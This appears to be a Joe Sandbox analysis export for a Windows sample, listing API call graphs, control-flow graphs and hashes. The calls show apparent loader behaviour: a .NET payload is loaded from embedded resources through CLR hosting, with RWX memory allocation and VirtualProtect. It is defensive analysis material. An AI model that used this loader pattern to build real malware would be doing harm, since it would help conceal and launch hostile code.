27545->27546 27548 5079f56 27546->27548 27549 5079f3c 27547->27549 27550 5079714 5 API calls 27548->27550 27606 5079714 27549->27606 27550->27544 27553->27554 27554->27511 27556 507560f 27555->27556 27557 5075e9d 27556->27557 27558 5072750 5 API calls 27556->27558 27557->27515 27561 5075614 27557->27561 27559 507bd1c 27558->27559 27616 507a570 27559->27616 27564 507561f 27561->27564 27562 507c096 27562->27515 27563 5072750 5 API calls 27565 507c166 27563->27565 27564->27562 27564->27563 27565->27515 27568 507567f 27566->27568 27567 507bbde 27567->27522 27568->27567 27569 5072750 5 API calls 27568->27569 27570 507bc38 27569->27570 27571 507a548 SendMessageW 27570->27571 27572 507bc49 27571->27572 27572->27522 27574 507c3d8 SendMessageW 27573->27574 27575 507c444 27574->27575 27575->27518 27577 507cd65 27576->27577 27578 5075604 5 API calls 27577->27578 27579 507601b 27578->27579 27586 22c93e8 27580->27586 27582 22ce441 27582->27528 27584 22c93e8 2 API calls 27583->27584 27585 22ce441 27583->27585 27584->27585 27585->27528 27587 22c93fb 27586->27587 27588 22c9413 27587->27588 27594 22c9660 27587->27594 27598 22c9670 27587->27598 27588->27582 27589 22c940b 27589->27588 27590 22c9610 GetModuleHandleW 27589->27590 27591 22c963d 27590->27591 27591->27582 27595 22c9684 27594->27595 27596 22c96a9 27595->27596 27602 22c8768 27595->27602 27596->27589 27599 22c9684 27598->27599 27600 22c8768 LoadLibraryExW 27599->27600 27601 22c96a9 27599->27601 27600->27601 27601->27589 27603 22c9850 LoadLibraryExW 27602->27603 27605 22c98c9 27603->27605 27605->27596 27607 507971f 27606->27607 27608 5072750 5 API calls 27607->27608 27609 507bc38 27608->27609 27613 507a548 27609->27613 27612->27543 27614 507bc60 SendMessageW 27613->27614 27615 507bc49 27614->27615 27615->27545 27617 507a57b 27616->27617 27620 5075830 27617->27620 27619 507be04 27619->27557 27621 507583b 27620->27621 27622 5078fcc 27621->27622 27623 5072750 5 API calls 27621->27623 27622->27619 27625 5078dec 27623->27625 27624 5075604 5 API calls 27624->27622 27625->27622 27625->27624 27626 401708 27631 401e16 SetUnhandledExceptionFilter 27626->27631 27628 40170d _com_raise_error 27632 4051cb 41 API calls _com_raise_error 27628->27632 27630 401718 27631->27628 27632->27630 27897 400fe9 27898 400fec CLRCreateInstance 27897->27898 27900 401047 SafeArrayCreate 27898->27900 27902 401134 SafeArrayAccessData 27900->27902 27903 401149 __InternalCxxFrameHandler 27902->27903 27904 401157 SafeArrayUnaccessData 27903->27904 27914 40116c 27904->27914 27905 4011ea GetCommandLineW CommandLineToArgvW SafeArrayCreateVector 27906 401213 27905->27906 27909 401280 27905->27909 27907 40124a SafeArrayCreateVector SafeArrayPutElement 27906->27907 27908 40121d SysAllocString SafeArrayPutElement 27906->27908 27907->27909 27908->27906 27908->27909 27910 4012b7 SafeArrayDestroy 27909->27910 27911 4012be 27909->27911 27910->27911 27912 4012c2 SafeArrayDestroy 27911->27912 27913 4012c9 27911->27913 27912->27913 27914->27905 27633 90d01c 27634 90d034 27633->27634 27635 90d08e 27634->27635 27637 5070be8 27634->27637 27638 5070c15 27637->27638 27639 5070c47 27638->27639 27641 5070d70 27638->27641 27643 5070d84 27641->27643 27642 5070e10 27642->27639 27645 5070e28 27643->27645 27646 5070e39 27645->27646 27649 50762f8 27645->27649 27666 5072442 27645->27666 27646->27642 27650 5076311 27649->27650 27655 5076324 27649->27655 27651 5076316 27650->27651 27652 5076358 27650->27652 27653 5076332 27651->27653 27654 507631b 27651->27654 27652->27655 27657 50765e4 27652->27657 27653->27655 27660 5076550 27653->27660 27661 50765ac 27653->27661 27664 507645e 27653->27664 27654->27655 27656 5076542 27654->27656 27655->27664 27684 5076a88 27655->27684 27670 5075820 27656->27670 27678 50758d0 27657->27678 27662 5075830 5 API calls 27660->27662 27674 5075890 27661->27674 27662->27664 27664->27646 27668 5072460 CallWindowProcW 27666->27668 27669 5072470 CallWindowProcW 27666->27669 27667 507245a 27667->27646 27668->27667 27669->27667 27671 507582b 27670->27671 27672 5076a88 4 API calls 27671->27672 27673 5076c9e 27672->27673 27673->27664 27675 507589b 27674->27675 27676 5076a88 4 API calls 27675->27676 27677 507d30c 27676->27677 27677->27664 27679 50758db 27678->27679 27680 5075830 5 API calls 27679->27680 27681 5078d68 27680->27681 27682 5076a88 4 API calls 27681->27682 27683 5078d71 27682->27683 27683->27664 27685 5076a93 27684->27685 27686 5076a9a 27684->27686 27685->27664 27689 5076aaa 27686->27689 27687 5076aa0 27687->27664 27690 5076ac6 27689->27690 27691 5076ae8 27689->27691 27693 5076ad4 27690->27693 27697 50717e0 27690->27697 27692 50717e0 4 API calls 27691->27692 27696 5076aef 27692->27696 27693->27687 27695 5076b10 27695->27687 27696->27687 27698 507182c 27697->27698 27699 5071c6b 27698->27699 27701 507187d 27698->27701 27702 5071870 27698->27702 27708 50711c8 27699->27708 27701->27695 27702->27701 27703 50721a5 GetFocus 27702->27703 27704 50721e6 27702->27704 27705 50721d2 27703->27705 27704->27701 27712 5076b28 27704->27712 27705->27704 27706 5071540 SendMessageW 27705->27706 27706->27705 27710 50711d3 27708->27710 27709 5078d3c 27709->27701 27711 5076b28 2 API calls 27710->27711 27711->27709 27713 5076b6e 27712->27713 27714 5076b91 27713->27714 27717 5072460 27713->27717 27721 5072470 27713->27721 27714->27701 27718 50724b2 27717->27718 27720 50724b9 27717->27720 27719 507250a CallWindowProcW 27718->27719 27718->27720 27719->27720 27720->27714 27722 50724b2 27721->27722 27724 50724b9 27721->27724 27723 507250a CallWindowProcW 27722->27723 27722->27724 27723->27724 27724->27714 27915 22cfe40 SetWindowLongW 27916 22cfeac 27915->27916 27917 22cbd00 DuplicateHandle 27918 22cbd96 27917->27918 27725 507e3d7 27726 507e3fc 27725->27726 27730 507e3dd 27725->27730 27727 5072750 5 API calls 27726->27727 27728 507e40e 27727->27728 27731 50732d8 27728->27731 27732 507e6e0 PostMessageW 27731->27732 27733 507e74c 27732->27733 27733->27730 27734 44d450 27735 44d468 27734->27735 27736 44d5c7 VirtualProtect VirtualProtect 27735->27736 27737 44d582 LoadLibraryA 27735->27737 27739 44d5fb 27736->27739 27738 44d599 27737->27738 27738->27735 27740 44d5ab GetProcAddress 27738->27740 27739->27739 27740->27738 27741 44d5c1 ExitProcess 27740->27741 27742 22cfbf8 27743 22cfc60 CreateWindowExW 27742->27743 27745 22cfd1c 27743->27745 27745->27745 27919 22c6758 27921 22c6766 27919->27921 27922 22c6344 27919->27922 27923 22c634f 27922->27923 27926 22c6394 27923->27926 27925 22c688d 27925->27921 27927 22c639f 27926->27927 27930 22c63c4 27927->27930 27929 22c6962 27929->27925 27931 22c63cf 27930->27931 27934 22c63f4 27931->27934 27933 22c6a62 27933->27929 27935 22c63ff 27934->27935 27940 22c6c10 27935->27940 27937 22c71bc 27937->27933 27938 22c6f93 27938->27937 27944 22cb3f8 27938->27944 27941 22c6c1b 27940->27941 27942 22c7e9a 27941->27942 27950 22c7eea 27941->27950 27942->27938 27945 22cb429 27944->27945 27946 22cb44d 27945->27946 27954 22cb5b8 27945->27954 27958 22cb575 27945->27958 27963 22cb5aa 27945->27963 27946->27937 27951 22c7f3b 27950->27951 27952 22c7f46 KiUserCallbackDispatcher 27951->27952 27953 22c7f70 27951->27953 27952->27953 27953->27942 27955 22cb5c5 27954->27955 27956 22cb5ff 27955->27956 27967 22ca0ec 27955->27967 27956->27946 27959 22cb58b 27958->27959 27960 22cb5d3 27958->27960 27959->27946 27961 22cb55f 27960->27961 27962 22ca0ec 9 API calls 27960->27962 27961->27946 27962->27961 27964 22cb5c5 27963->27964 27965 22cb5ff 27964->27965 27966 22ca0ec 9 API calls 27964->27966 27965->27946 27966->27965 27968 22ca0f1 27967->27968 27970 22cc2f8 27968->27970 27971 22cb904 27968->27971 27970->27970 27972 22cb90f 27971->27972 27973 22cc367 27972->27973 27974 22c63f4 9 API calls 27972->27974 27975 22cc375 27973->27975 27981 22cc3e0 27973->27981 27990 22cc3d0 27973->27990 27974->27973 27977 22ce0d8 2 API calls 27975->27977 27978 22ce0f0 2 API calls 27975->27978 27976 22cc3a0 27976->27970 27977->27976 27978->27976 27982 22cc40e 27981->27982 27984 22cc437 27982->27984 27987 22cc4df 27982->27987 28003 22cb9a0 GetFocus 27982->28003 27984->27987 27988 5072750 5 API calls 27984->27988 27999 507273f 27984->27999 27985 22cc486 27986 22cc4da KiUserCallbackDispatcher 27985->27986 27986->27987 27988->27985 27991 22cc40e 27990->27991 27993 22cc437 27991->27993 27996 22cc4df 27991->27996 28004 22cb9a0 GetFocus 27991->28004 27993->27996 27997 5072750 5 API calls 27993->27997 27998 507273f 5 API calls 27993->27998 27994 22cc486 27995 22cc4da KiUserCallbackDispatcher 27994->27995 27995->27996 27997->27994 27998->27994 28000 5072760 27999->28000 28001 507279d 28000->28001 28002 5075d48 LoadLibraryExW GetModuleHandleW SendMessageW SendMessageW CreateIconFromResourceEx 28000->28002 28001->27985 28002->28001 28003->27984 28004->27993 27746 40171a 27747 401726 __FrameHandler3::FrameUnwindToState 27746->27747 27774 401992 27747->27774 27749 40172d 27750 401880 27749->27750 27763 401757 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 27749->27763 27796 401c83 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _com_raise_error 27750->27796 27752 401887 27797 40506f 21 API calls CallUnexpected 27752->27797 27754 40188d 27798 405033 21 API calls CallUnexpected 27754->27798 27756 401895 27799 401bba GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 27756->27799 27757 401776 27759 40189b __scrt_common_main_seh 27760 4017f7 27785 401d9e 27760->27785 27762 4017fd 27789 40147b GetModuleHandleW FindResourceW 27762->27789 27763->27757 27763->27760 27795 405049 41 API calls 4 library calls 27763->27795 27775 40199b 27774->27775 27800 40207b IsProcessorFeaturePresent 27775->27800 27777 4019a7 27801 4025ca 10 API calls 2 library calls 27777->27801 27779 4019ac 27784 4019b0 27779->27784 27802 40563d 27779->27802 27782 4019c7 27782->27749 27784->27749 27861 402470 27785->27861 27787 401db1 GetStartupInfoW 27788 401dc4 27787->27788 27788->27762 27790 40149d GetModuleHandleW LoadResource 27789->27790 27791 4014de ExitProcess 27789->27791 27792 4014d7 FreeResource 27790->27792 27793 4014af LockResource GetModuleHandleW SizeofResource 27790->27793 27792->27791 27793->27792 27794 4014cc 27793->27794 27794->27792 27795->27760 27796->27752 27797->27754 27798->27756 27799->27759 27800->27777 27801->27779 27806 40870d 27802->27806 27805 4025e9 7 API calls 2 library calls 27805->27784 27807 40871d 27806->27807 27808 4019b9 27806->27808 27807->27808 27810 407a4c 27807->27810 27808->27782 27808->27805 27811 407a58 __FrameHandler3::FrameUnwindToState 27810->27811 27822 407596 RtlEnterCriticalSection 27811->27822 27813 407a5f 27823 4076f1 27813->27823 27816 407a7d 27838 407aa3 RtlLeaveCriticalSection CallUnexpected 27816->27838 27819 407a78 27837 40799c GetStdHandle GetFileType 27819->27837 27820 407a8e 27820->27807 27822->27813 27824 4076fd __FrameHandler3::FrameUnwindToState 27823->27824 27825 407706 27824->27825 27826 407727 27824->27826 27847 40649b 14 API calls _com_raise_error 27825->27847 27839 407596 RtlEnterCriticalSection 27826->27839 27829 40770b 27848 4062a0 41 API calls _com_raise_error 27829->27848 27831 407715 27831->27816 27836 4078e6 44 API calls 27831->27836 27832 40775f 27849 407786 RtlLeaveCriticalSection CallUnexpected 27832->27849 27834 407733 27834->27832 27840 407641 27834->27840 27836->27819 27837->27816 27838->27820 27839->27834 27850 4064ae 27840->27850 27842 407653 27843 407660 27842->27843 27857 408562 6 API calls _unexpected 27842->27857 27858 40650b 14 API calls 2 library calls 27843->27858 27846 4076b5 27846->27834 27847->27829 27848->27831 27849->27831 27855 4064bb _unexpected 27850->27855 27851 4064fb 27860 40649b 14 API calls _com_raise_error 27851->27860 27852 4064e6 RtlAllocateHeap 27853 4064f9 27852->27853 27852->27855 27853->27842 27855->27851 27855->27852 27859 4087b5 RtlEnterCriticalSection RtlLeaveCriticalSection _unexpected 27855->27859 27857->27842 27858->27846 27859->27855 27860->27853 27861->27787 28005 507353c 28006 5073547 28005->28006 28009 507357c 28006->28009 28008 5074aed 28010 5073587 28009->28010 28013 507521e 28010->28013 28014 5075374 28010->28014 28015 5074ee4 28010->28015 28011 5074ee4 9 API calls 28011->28014 28013->28011 28013->28014 28014->28008 28016 5074eef 28015->28016 28019 50759c8 28016->28019 28017 50755ab 28017->28013 28022 50759ee 28019->28022 28020 5075a02 28020->28017 28021 5075adf 28024 5075aed 28021->28024 28032 22cc3e0 7 API calls 28021->28032 28033 22cc3d0 7 API calls 28021->28033 28022->28020 28022->28021 28023 5075b42 28022->28023 28027 5075b3d 28023->28027 28029 5072750 5 API calls 28023->28029 28025 5072750 5 API calls 28024->28025 28024->28027 28026 5075b15 28025->28026 28034 50750d4 28026->28034 28027->28017 28030 5075be7 28029->28030 28030->28027 28031 5075120 5 API calls 28030->28031 28031->28027 28032->28024 28033->28024 28035 507d240 PostMessageW 28034->28035 28036 507d2ac 28035->28036 28036->28027 27862 22c92f0 27864 22c93e8 2 API calls 27862->27864 27866 22c93d8 27862->27866 27863 22c92ff 27864->27863 27867 22c93fb 27866->27867 27868 22c9413 27867->27868 27872 22c9660 LoadLibraryExW 27867->27872 27873 22c9670 LoadLibraryExW 27867->27873 27868->27863 27869 22c940b 27869->27868 27870 22c9610 GetModuleHandleW 27869->27870 27871 22c963d 27870->27871 27871->27863 27872->27869 27873->27869 28037 22cb6d0 GetCurrentProcess 28038 22cb74a GetCurrentThread 28037->28038 28041 22cb743 28037->28041 28039 22cb787 GetCurrentProcess 28038->28039 28040 22cb780 28038->28040 28044 22cb7bd 28039->28044 28040->28039 28041->28038 28042 22cb7e5 GetCurrentThreadId 28043 22cb816 28042->28043 28044->28042 27874 50725d8 27875 50725e8 27874->27875 27878 5078898 27875->27878 27876 5072611 27879 50788cd 27878->27879 27882 5073660 27879->27882 27881 5078922 27881->27876 27888 507368c 27882->27888 27883 50738bc 27884 5073a87 27883->27884 27885 5072750 5 API calls 27883->27885 27884->27881 27886 5073a64 27885->27886 27887 50732d8 PostMessageW 27886->27887 27887->27884 27888->27883 27889 5072750 5 API calls 27888->27889 27893 50737e5 27888->27893 27890 50737af 27889->27890 27891 5072750 5 API calls 27890->27891 27891->27893 27892 5072750 5 API calls 27892->27883 27893->27892 27894 507c4d8 27895 5072750 5 API calls 27894->27895 27896 507c4e8 27895->27896 28045 507a0f8 28046 507a109 28045->28046 28049 507a173 28046->28049 28050 5079788 28046->28050 28052 5079793 28050->28052 28051 507a16c 28052->28051 28054 507b889 28052->28054 28055 507b8b2 28054->28055 28056 507b8bf 28055->28056 28057 507b8e8 CreateIconFromResourceEx 28055->28057 28056->28051 28058 507b966 28057->28058 28058->28051

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040148E
                                                                                  • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 00401491
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014A0
                                                                                  • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014A3
                                                                                  • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014B0
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014BC
                                                                                  • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014BF
                                                                                    • Part of subcall function 0040147B: CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037
                                                                                  • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014D8
                                                                                  • ExitProcess.KERNEL32 ref: 004014E0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                                                                  • String ID: v4.0.30319
                                                                                  • API String ID: 2372384083-3152434051
                                                                                  • Opcode ID: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
                                                                                  • Instruction ID: 1025187115c16df301aa5e6fb14f5cc9936e15f8599d421e9e42fb84dc5f9529
                                                                                  • Opcode Fuzzy Hash: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
                                                                                  • Instruction Fuzzy Hash: D4F04470A0131477EB202BF34D4DF2B755C9F85746F040874F601BA2A0CAB4DC008679
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E22,0040170D), ref: 00401E1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
                                                                                  • Instruction ID: 1700cd800284021a96fa1165edcf07aa52b884b6f150888f85792e917e9d8571
                                                                                  • Opcode Fuzzy Hash: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 400f61-400f84 1 400ff6-401003 0->1 2 400f86-400f94 0->2 3 401009-40105a CLRCreateInstance 1->3 2->1 5 40105e-401082 3->5 9 401088-40109b 5->9 10 40109f-4010a3 9->10 11 4010a9-4010ad 10->11 12 4010b2-4010c1 11->12 14 4010c3-4010c5 12->14 15 4010c9-4010d1 12->15 14->15 16 4010d6-4010f0 15->16 19 4010f2-4010f4 16->19 20 4010f8-40110a 16->20 19->20 22 401110-40112e SafeArrayCreate 20->22 23 401134-401171 SafeArrayAccessData call 403120 SafeArrayUnaccessData 22->23 28 401173-401175 23->28 29 401179-401182 23->29 28->29 67 401183 call 8fd01d 29->67 68 401183 call 8fd01c 29->68 30 401189-4011a3 33 4011a5-4011a7 30->33 34 4011ab-4011b1 30->34 33->34 69 4011b2 call 8fd01d 34->69 70 4011b2 call 8fd01c 34->70 35 4011b5-4011c4 37 4011ca-4011d0 35->37 65 4011d1 call 8fd01d 37->65 66 4011d1 call 8fd01c 37->66 38 4011d4-401211 GetCommandLineW CommandLineToArgvW SafeArrayCreateVector 41 401280-401288 38->41 42 401213-40121b 38->42 43 401290-401295 41->43 44 40128a-40128c 41->44 45 40124a-40127a SafeArrayCreateVector SafeArrayPutElement 42->45 46 40121d-40123c SysAllocString SafeArrayPutElement 42->46 47 401297-401299 43->47 48 40129d-4012a2 43->48 44->43 45->41 46->41 49 40123e-401248 46->49 47->48 50 4012b3-4012b5 48->50 51 4012a4-4012ae 48->51 49->45 49->46 52 4012b7-4012b8 SafeArrayDestroy 50->52 53 4012be-4012c0 50->53 51->50 52->53 55 4012c2-4012c3 SafeArrayDestroy 53->55 56 4012c9-4012ce 53->56 55->56 57 4012d0-4012d2 56->57 58 4012d6-4012db 56->58 57->58 59 4012e3-4012e8 58->59 60 4012dd-4012df 58->60 61 4012f0-4012f5 59->61 62 4012ea-4012ec 59->62 60->59 63 4012f7-4012f9 61->63 64 4012fd-401303 61->64 62->61 63->64 65->38 66->38 67->30 68->30 69->35 70->35
                                                                                  APIs
                                                                                  • CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInstance
                                                                                  • String ID: v4.0.30319
                                                                                  • API String ID: 542301482-3152434051
                                                                                  • Opcode ID: 77243af43771274cdb188aef89358dc4b6a46996269f3f5b9eca3cf8be097b49
                                                                                  • Instruction ID: e5bbcf8570dedd721561150fbe93f273e631184976035fe4b26c3be348694e41
                                                                                  • Opcode Fuzzy Hash: 77243af43771274cdb188aef89358dc4b6a46996269f3f5b9eca3cf8be097b49
                                                                                  • Instruction Fuzzy Hash: A3B14A75A012199FCB01CFA4C988EAEBBB9BF48754B14446EE905FB360DB35DD01CB64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 71 400fca-400fcc 72 400fec-401003 71->72 73 400fce 71->73 75 401009-40105a CLRCreateInstance 72->75 73->72 77 40105e-401082 75->77 81 401088-40109b 77->81 82 40109f-4010a3 81->82 83 4010a9-4010ad 82->83 84 4010b2-4010c1 83->84 86 4010c3-4010c5 84->86 87 4010c9-4010d1 84->87 86->87 88 4010d6-4010f0 87->88 91 4010f2-4010f4 88->91 92 4010f8-40110a 88->92 91->92 94 401110-40112e SafeArrayCreate 92->94 95 401134-401171 SafeArrayAccessData call 403120 SafeArrayUnaccessData 94->95 100 401173-401175 95->100 101 401179-401182 95->101 100->101 141 401183 call 8fd01d 101->141 142 401183 call 8fd01c 101->142 102 401189-4011a3 105 4011a5-4011a7 102->105 106 4011ab-4011b1 102->106 105->106 137 4011b2 call 8fd01d 106->137 138 4011b2 call 8fd01c 106->138 107 4011b5-4011c4 109 4011ca-4011d0 107->109 139 4011d1 call 8fd01d 109->139 140 4011d1 call 8fd01c 109->140 110 4011d4-401211 GetCommandLineW CommandLineToArgvW SafeArrayCreateVector 113 401280-401288 110->113 114 401213-40121b 110->114 115 401290-401295 113->115 116 40128a-40128c 113->116 117 40124a-40127a SafeArrayCreateVector SafeArrayPutElement 114->117 118 40121d-40123c SysAllocString SafeArrayPutElement 114->118 119 401297-401299 115->119 120 40129d-4012a2 115->120 116->115 117->113 118->113 121 40123e-401248 118->121 119->120 122 4012b3-4012b5 120->122 123 4012a4-4012ae 120->123 121->117 121->118 124 4012b7-4012b8 SafeArrayDestroy 122->124 125 4012be-4012c0 122->125 123->122 124->125 127 4012c2-4012c3 SafeArrayDestroy 125->127 128 4012c9-4012ce 125->128 127->128 129 4012d0-4012d2 128->129 130 4012d6-4012db 128->130 129->130 131 4012e3-4012e8 130->131 132 4012dd-4012df 130->132 133 4012f0-4012f5 131->133 134 4012ea-4012ec 131->134 132->131 135 4012f7-4012f9 133->135 136 4012fd-401303 133->136 134->133 135->136 137->107 138->107 139->110 140->110 141->102 142->102
                                                                                  APIs
                                                                                  • CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInstance
                                                                                  • String ID: v4.0.30319
                                                                                  • API String ID: 542301482-3152434051
                                                                                  • Opcode ID: d5844462e1a5dd029352ded2376a126f08e6edf1cdd364a8f2b9e562c4d8b20e
                                                                                  • Instruction ID: f08f0f033d3d63231fbdb02c94349a7a69f50f577d8668260f178b61efdc381d
                                                                                  • Opcode Fuzzy Hash: d5844462e1a5dd029352ded2376a126f08e6edf1cdd364a8f2b9e562c4d8b20e
                                                                                  • Instruction Fuzzy Hash: E2B12B75A012199FDB01CFA4C988EAEBBB9BF88750B14446EE905FB3A0DB35DD01CB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 143 400fe9-4010c1 CLRCreateInstance 157 4010c3-4010c5 143->157 158 4010c9-4010f0 143->158 157->158 162 4010f2-4010f4 158->162 163 4010f8-401171 SafeArrayCreate SafeArrayAccessData call 403120 SafeArrayUnaccessData 158->163 162->163 171 401173-401175 163->171 172 401179-401182 163->172 171->172 212 401183 call 8fd01d 172->212 213 401183 call 8fd01c 172->213 173 401189-4011a3 176 4011a5-4011a7 173->176 177 4011ab-4011b1 173->177 176->177 208 4011b2 call 8fd01d 177->208 209 4011b2 call 8fd01c 177->209 178 4011b5-4011d0 210 4011d1 call 8fd01d 178->210 211 4011d1 call 8fd01c 178->211 181 4011d4-401211 GetCommandLineW CommandLineToArgvW SafeArrayCreateVector 184 401280-401288 181->184 185 401213-40121b 181->185 186 401290-401295 184->186 187 40128a-40128c 184->187 188 40124a-40127a SafeArrayCreateVector SafeArrayPutElement 185->188 189 40121d-40123c SysAllocString SafeArrayPutElement 185->189 190 401297-401299 186->190 191 40129d-4012a2 186->191 187->186 188->184 189->184 192 40123e-401248 189->192 190->191 193 4012b3-4012b5 191->193 194 4012a4-4012ae 191->194 192->188 192->189 195 4012b7-4012b8 SafeArrayDestroy 193->195 196 4012be-4012c0 193->196 194->193 195->196 198 4012c2-4012c3 SafeArrayDestroy 196->198 199 4012c9-4012ce 196->199 198->199 200 4012d0-4012d2 199->200 201 4012d6-4012db 199->201 200->201 202 4012e3-4012e8 201->202 203 4012dd-4012df 201->203 204 4012f0-4012f5 202->204 205 4012ea-4012ec 202->205 203->202 206 4012f7-4012f9 204->206 207 4012fd-401303 204->207 205->204 206->207 208->178 209->178 210->181 211->181 212->173 213->173
                                                                                  APIs
                                                                                  • CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037
                                                                                  • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 00401121
                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00401139
                                                                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 0040115B
                                                                                  • GetCommandLineW.KERNEL32(?), ref: 004011EE
                                                                                  • CommandLineToArgvW.SHELL32(00000000), ref: 004011F5
                                                                                  • SafeArrayCreateVector.OLEAUT32(00000008,00000000,?), ref: 00401204
                                                                                  • SysAllocString.OLEAUT32(?), ref: 00401226
                                                                                  • SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 00401232
                                                                                  • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 0040124F
                                                                                  • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 00401270
                                                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 004012B8
                                                                                  • SafeArrayDestroy.OLEAUT32(00000000), ref: 004012C3
                                                                                  • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00401312
                                                                                  • CoInitialize.OLE32(00000000), ref: 00401322
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00401344
                                                                                  • VariantInit.OLEAUT32(?), ref: 0040140D
                                                                                  • VariantInit.OLEAUT32(?), ref: 00401416
                                                                                  • VariantClear.OLEAUT32(?), ref: 00401438
                                                                                  • VariantClear.OLEAUT32(?), ref: 0040144A
                                                                                  • VariantClear.OLEAUT32(?), ref: 00401453
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040148E
                                                                                  • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 00401491
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014A0
                                                                                  • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014A3
                                                                                  • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014B0
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014BC
                                                                                  • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014BF
                                                                                  • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014D8
                                                                                  • ExitProcess.KERNEL32 ref: 004014E0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$CreateResourceVariant$ClearHandleModule$AllocCommandDataDestroyElementInitLineVector$AccessArgvExitFindFreeInitializeInstanceLoadLockProcessSizeofStringUnaccessVirtual
